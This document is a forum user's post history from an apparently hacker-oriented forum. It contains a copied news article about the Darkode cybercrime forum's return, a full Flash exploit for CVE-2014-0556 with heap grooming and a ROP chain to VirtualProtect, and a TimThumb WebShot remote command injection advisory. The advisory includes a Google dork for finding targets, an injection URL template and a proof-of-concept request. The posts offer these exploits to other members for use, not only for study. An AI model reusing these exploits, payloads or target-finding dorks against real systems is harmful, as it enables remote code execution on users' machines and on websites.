Jump to content

sniffer

Members
  • Posts

    8
  • Joined

  • Last visited

Posts posted by sniffer

  1. Illegal malware marketplace and hacker forum Darkode is back online, weeks after a US-European sting operation claimed to have arrested those behind it.

    At the time of the takedown, announced 15 July, Europol estimated that between 250-300 members were using "the most prolific English-speaking cybercriminal forum to date… to trade and barter their hacking expertise, malware and botnets, and to find partners for their next spam runs or malware attacks". 28 people were arrested at the finale of the 18-month operation, including a 26-year-old from Coventry.

    But already a holding site, darkcode.cc, is live and advertising its new and improved services, showing you can't keep a dedicated hacker down. A post on the homepage not only reveals that the ringleaders are still operational and not behind bars, but offers up instructions to the marketplace to ensure customers don't get itchy feet.

    The first of two posts says: "Most of the staff is intact, along with senior members. It appears the raids focused on newly added individuals or people that have been retired from the scene for years."

    It goes on to confirm the forum will be "back in onion land" -- referring to secure, anonymous router Tor -- in an invite-only format. A "generate onion" button sits on the page, but is currently not operational. Knowing the eyes of the law are squarely on it, the forum claims it will only accept known members it can confirm - authentication will be made using the Blockchain API. Like Silk Road 2.0 before it, all this is designed to attract users back and assure them their details will be secure after the raid, with the post continuing: "We will not store any form of user information except a hash of the BTC Guid, a BTC Wallet, and an alias if the user chooses to create one." It warns members to avoid anyone publicly claiming to be a member, and anyone who joined Darkode in the last six to eight months (they'll likely be an informant).

    "We believe full disclosure on how the new forum will function is necessary to allow members to have confidence in its security. Our mission is to cast out any doubts in the setup as well as allow the world to critique the new system."

    As spotted by the Register, 21-year-old UK programmer and malware analyst MalwareTech seems to have the inside track on the site operators, and has backed up suggestions that the main admin at Darkode was not arrested in the July raid made by the FBI and European Cybercrime Centre.

    "Originally the main admin known as 'Sp3cial1st' had posted a statement on pastebin declaring that he wanted to wait and see who all of the 70 users arrested were before bringing the forums back online," writes MalwareTech. Sp3cial1st launched darkcode.cc as a holding page a few hours after that statement, though. The new format, with all members having their own onion address, "would allow the darkode admins greater control over who gets access, preventing people from accessing a hacked account without the owner's onion url," writes MalwareTech. "It would also allow them to better monitor who views what by creating an individual log file for each onion, meaning they could quickly weed out leakers."

    "Even more interesting it states that bitcoin wallets would be tied to accounts and used for users to authenticate on the forums, this would mean that hackers could not use a hacked account to scam with unless they know the user's private key."

    Source : Hacker forum Darkode is back and more secure than ever (Wired UK)

  2. CVE-2014-0556 : Heap-based buffer overflow in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS

    Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow ? Packet Storm


    /*
    <html>
    <head>
    <title>CVE-2014-0556</title>
    </head>
    <body>
    <object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
    <button onclick="swf.exploit()">STOP</button>
    </body>
    </html>
    */
    /*
    (1728.eb0): Break instruction exception - code 80000003 (first chance)
    eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
    eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
    08d63048 cc int 3
    1:020> dd esp l4
    08d63048 cccccccc cccccccc cccccccc cccccccc
    1:020> t
    eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
    eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
    08d63049 cc int 3
    1:020> t
    eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
    eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
    08d6304a cc int 3
    1:020> t
    eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
    eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
    08d6304b cc int 3
    1:020> t
    eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
    eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
    08d6304c cc int 3
    */
    package
    {
    import flash.events.*
    import flash.media.*
    import flash.display.*
    import flash.geom.*
    import flash.utils.*
    import flash.text.*
    import flash.external.ExternalInterface

    public class Main extends Sprite {
    private var i0:uint
    private var i1:uint
    private var i2:uint
    private var i3:uint
    private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145")
    private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
    private var ob:Vector.<Object> = new Vector.<Object>(6400)
    private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
    private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
    private var snd:Sound
    private var vector:uint
    private var vtable:uint
    private var flash:uint
    public function Main():void {

    for (i0 = 0; i0 < 3200; i0++) {
    ba[i0] = new ByteArray()
    ba[i0].length = 0x2000
    ba[i0].position = 0xfffff000
    }

    for (i0 = 0; i0 < 3200; i0++) {
    if (i0 % 2 == 0) ba[i0] = null
    ob[i0 * 2] = new Vector.<uint>(1008)
    ob[i0 * 2 + 1] = new Vector.<uint>(1008)
    }

    bitmap.copyPixelsToByteArray(rect, ba[1601])

    for (i0 = 0;; i0++)
    if (ob[i0].length != 1008) break

    ob[i0][1024 * 3 - 2] = 0xffffffff

    for (i1 = 0;; i1++) {
    if (i0 == i1) continue
    if (ob[i1].length != 1008) break
    }

    ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
    ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
    ob[i0].fixed = true

    for (i2 = 1000;; i2++) {
    if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) {
    vector = ob[i1][0xFFFFFFFF - i2 + 11]
    break
    } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) {
    vector = ob[i1][i2 + 11]
    break
    }
    }

    snd = new Sound()

    for (i2 = 0; i2 < 6400; i2++) {
    if (i2 == i0 || i2 == i1) continue
    ob[i2] = null
    ob[i2] = new Vector.<Object>(1014)
    ob[i2][0] = snd
    ob[i2][1] = snd
    }

    for (i2 = 0;; i2++) {
    if (ob[i0][i2 + 0] == 1014 &&
    ob[i0][i2 + 1] == ob[i0][i2 + 2] &&
    ob[i0][i2 + 3] == 1
    ) {
    vtable = read(ob[i0][i2 + 1] - 1)
    flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx
    write(ob[i0][i2 + 1] - 1, vector + 0xf54)
    for (i3 = 0; i3 < 1008; i3++) {
    ob[i0][i3] = 0x41414100 | i3
    }
    ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN
    ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes
    ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN
    ob[i0][3] = 0x00000201 // 0x00000201
    ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN
    ob[i0][5] = 0x00000040 // 0x00000040
    ob[i0][6] = flash + 0x00691119 // POP ECX # RETN
    ob[i0][7] = vector + 2000 // Writable location
    ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN
    ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP)
    ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN
    ob[i0][11] = flash + 0x0000d83f // JMP [EAX]
    ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN
    ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect()
    ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN
    ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp'
    ob[i0][16] = 0xcccccccc // shellcode
    ob[i0][17] = 0xcccccccc // shellcode
    ob[i0][18] = 0xcccccccc // shellcode
    ob[i0][19] = 0xcccccccc // shellcode
    ob[i0][979] = flash + 0x0029913A // POP EAX # RETN
    ob[i0][980] = 0x00000f58
    ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN
    ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN
    ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN
    ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN
    break
    }
    }

    ob[i1][0xFFFFFFFE - 1024 * 3] = 4096
    ob[i0][1024 * 3 - 2] = 0
    str += flash.toString(16)
    var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf)

    if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)
    }

    private function write(addr:uint, data:uint):void {
    ob[i0][(addr - vector) / 4 - 2] = data
    }

    private function read(addr:uint):uint {
    return ob[i0][(addr - vector) / 4 - 2]
    }

    private function zeroPad(number:String, width:int):String {
    if (number.length < width)
    return "0" + zeroPad(number, width-1)
    return number
    }

    public function exploit():void {
    snd.toString()
    }
    }
    }

    • Upvote 1
  3. exploit : http://www.exploit-db.com/exploits/33851/

    news : Zero-Day TimThumb WebShot Vulnerability leaves Thousands of Wordpress Blogs at Risk - The Hacker News

    Dork : inurl:"/themify/" intitle:"index of /"


    ######################################################################
    # _ ___ _ _ ____ ____ _ _____
    # | | / _ \| \ | |/ ___|/ ___| / \|_ _|
    # | | | | | | \| | | _| | / _ \ | |
    # | |__| |_| | |\ | |_| | |___ / ___ \| |
    # |_____\___/|_| \_|\____|\____/_/ \_\_|
    #
    # Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)
    # Affected website : a lot Wordpress Themes, Plugins, 3rd party components
    # Exploit Author : @u0x (Pichaya Morimoto)
    # Release dates : June 24, 2014
    #
    # Special Thanks to 2600 Thailand group
    # : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio
    # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
    #
    ########################################################################

    [+] Description
    ============================================================
    TimThumb is a small php script for cropping, zooming and resizing web
    images (jpg, png, gif). Perfect for use on blogs and other applications.
    Developed for use in the WordPress theme Mimbo Pro, and since used in many
    other WordPress themes.

    http://www.binarymoon.co.uk/projects/timthumb/
    https://code.google.com/p/timthumb/

    The original project WordThumb 1.07 also vulnerable (
    https://code.google.com/p/wordthumb/)
    They both shared exactly the same WebShot code! And there are several
    projects that shipped with "timthumb.php", such as,
    Wordpress Gallery Plugin
    https://wordpress.org/plugins/wordpress-gallery-plugin/
    IGIT Posts Slider Widget
    http://wordpress.org/plugins/igit-posts-slider-widget/

    All themes from http://themify.me/ contains vulnerable "wordthumb" in
    "<theme-name>/themify/img.php".

    [+] Exploit
    ============================================================
    http://
    <wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://
    <wp-website>$(<os-cmds>)

    ** Note that OS commands payload MUST be within following character sets:
    [A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]

    ** Spaces, Pipe, GT sign are not allowed.
    ** This WebShot feature is DISABLED by default.
    ** CutyCapt and XVFB must be installed in constants.

    [+] Proof-of-Concept
    ============================================================
    There are couple techniques that can be used to bypass limited charsets but
    I will use a shell variable $IFS insteads of space in this scenario.

    PoC Environment:
    Ubuntu 14.04 LTS
    PHP 5.5.9
    Wordpress 3.9.1
    Themify Parallax Theme 1.5.2
    WordThumb 1.07

    Crafted Exploit:
    http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat)

    GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=
    http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1
    Host: longcatlab.local
    Proxy-Connection: keep-alive
    Cache-Control: max-age=0
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/35.0.1916.153 Safari/537.36
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Cookie: woocommerce_recently_viewed=9%7C12%7C16;
    wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce;
    wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot;
    wordpress_test_cookie=WP+Cookie+check;
    wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685

    HTTP/1.1 400 Bad Request
    Date: Tue, 24 Jun 2014 07:20:48 GMT
    Server: Apache
    X-Powered-By: PHP/5.5.9-1ubuntu4
    X-Content-Type-Options: nosniff
    X-Frame-Options: sameorigin
    Content-Length: 3059
    Connection: close
    Content-Type: text/html


    <a href='http://www.php.net/function.getimagesize'
    target='_new'>getimagesize</a>
    ( )</td><td
    title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php'
    bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr>
    </table></font>
    <h1>A WordThumb error has occured</h1>The following error(s) occured:<br
    /><ul><li>The image being resized is not a valid gif, jpg or
    png.</li></ul><br /><br />Query String : webshot=1&src=
    http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version :
    1.07</pre>

    Even it response with error messages but injected OS command has already
    been executed.

    $ ls /tmp/longcat -lha
    - -rw-r--r-- 1 www-data www-data 0 ??.?. 24 14:20 /tmp/longcat


    [+] Vulnerability Analysis
    ============================================================
    https://timthumb.googlecode.com/svn/trunk/timthumb.php

    Filename: timthumb.php

    if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);
    if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT',
    '/usr/local/bin/CutyCapt');
    if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run');
    ...
    timthumb::start(); ? start script
    ...
    public static function start(){
    $tim = new timthumb(); ? create timthumb object, call __construct()
    ...
    $tim->run();
    ...
    public function __construct(){
    ...
    $this->src = $this->param('src'); ? set "src" variable to HTTP GET "src"
    parameter

    if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){
    ...
    $this->isURL = true; ? prefix http/s result in isURL = true
    }
    ...

    protected function param($property, $default = ''){
    if (isset ($_GET[$property])) {
    return $_GET[$property];
    ...

    public function run(){
    if($this->isURL){
    ...
    if($this->param('webshot')){ ? HTTP GET "webshot" must submitted
    if(WEBSHOT_ENABLED){ ? this pre-defined constant must be true
    ...
    $this->serveWebshot(); ? call webshot feature
    } else {
    ...

    protected function serveWebshot(){
    ...
    if(! is_file(WEBSHOT_CUTYCAPT)){ ? check existing of cutycapt
    return $this->error("CutyCapt is not installed. $instr");
    }
    if(! is_file(WEBSHOT_XVFB)){ ? check existing of xvfb
    return $this->Error("Xvfb is not installed. $instr");
    }
    ...
    $url = $this->src;
    if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ? check valid
    URL #LoL
    return $this->error("Invalid URL supplied.");
    }
    $url =
    preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/',
    '', $url); ? check valid URL as specified in RFC 3986
    http://www.ietf.org/rfc/rfc3986.txt
    ...
    if(WEBSHOT_XVFB_RUNNING){
    putenv('DISPLAY=:100.0');
    $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\"
    --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
    --js-can-open-windows=off --url=\"$url\" --out-format=$format
    --out=$tempfile"; ? OS shell command injection
    } else {
    $command = "$xv --server-args=\"-screen 0,
    {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout
    --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
    --js-can-open-windows=off --url=\"$url\" --out-format=$format
    --out=$tempfile"; ? OS shell command injection
    }
    ...
    $out = `$command`; ? execute $command as shell command

    "PHP supports one execution operator: backticks (``). Note that these are
    not single-quotes! PHP will attempt to execute the contents of the
    backticks as a shell command." -
    http://www.php.net//manual/en/language.operators.execution.php

    "$url" is failed to escape "$()" in "$command" which is result in arbitrary
    code execution.

    Jabber : Sniffer@jabber.ru

    Skype : Ali_Sniffer

    • Upvote 1
×
×
  • Create New...